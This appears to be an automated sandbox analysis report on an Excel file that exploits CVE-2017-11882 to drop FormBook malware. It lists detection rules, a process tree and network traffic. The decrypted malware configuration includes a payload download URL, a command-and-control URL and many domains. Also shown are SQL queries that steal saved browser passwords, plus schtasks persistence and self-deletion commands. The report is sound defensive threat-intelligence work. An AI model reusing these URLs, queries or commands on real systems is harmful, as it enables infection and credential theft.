Loading ...

Play interactive tourEdit tour

Analysis Report Doc_37584567499454.xlsx

Overview

General Information

Sample Name:Doc_37584567499454.xlsx
Analysis ID:345175
MD5:3cee064f8475688e425d7ade676a1598
SHA1:bad71a575189539a0c57a78cdd24524fe8a2a845
SHA256:efcc32d3d6d53019b57fbbf107ab622a6374c8d0816c05d1c7687b57c97152e8
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2556 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2716 cmdline: 'C:\Users\Public\vbc.exe' MD5: 351B0B74944773C3C36D417EEF151670)
      • schtasks.exe (PID: 2764 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 960 cmdline: {path} MD5: 351B0B74944773C3C36D417EEF151670)
      • vbc.exe (PID: 2480 cmdline: {path} MD5: 351B0B74944773C3C36D417EEF151670)
      • vbc.exe (PID: 2464 cmdline: {path} MD5: 351B0B74944773C3C36D417EEF151670)
      • vbc.exe (PID: 2300 cmdline: {path} MD5: 351B0B74944773C3C36D417EEF151670)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmstp.exe (PID: 2268 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 00263CA2071DC9A6EE577EB356B0D1D9)
            • cmd.exe (PID: 312 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", "escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      10.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        10.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        10.2.vbc.exe.400000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        10.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          10.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2556, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2716
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.26.106.165, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2556, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2556, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\Public\vbc.exe' , ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 2716, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp', ProcessId: 2764
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\Public\vbc.exe', CommandLine: /c del 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 2268, ProcessCommandLine: /c del 'C:\Users\Public\vbc.exe', ProcessId: 312
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2556, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2716
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2556, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2716
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2556, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2716

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://medicelcoolers.cn/file2.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 10.2.vbc.exe.400000.2.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
          Multi AV Scanner detection for domain / URLShow sources
          Source: medicelcoolers.cnVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: Doc_37584567499454.xlsxReversingLabs: Detection: 23%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: 10.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdb source: vbc.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: vbc.exe, 0000000A.00000002.2215893873.0000000000839000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 005D0EFDh
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 005D0EFDh
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: medicelcoolers.cn
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.26.106.165:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.26.106.165:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 185.26.106.165:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 52.209.107.24:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 52.209.107.24:80
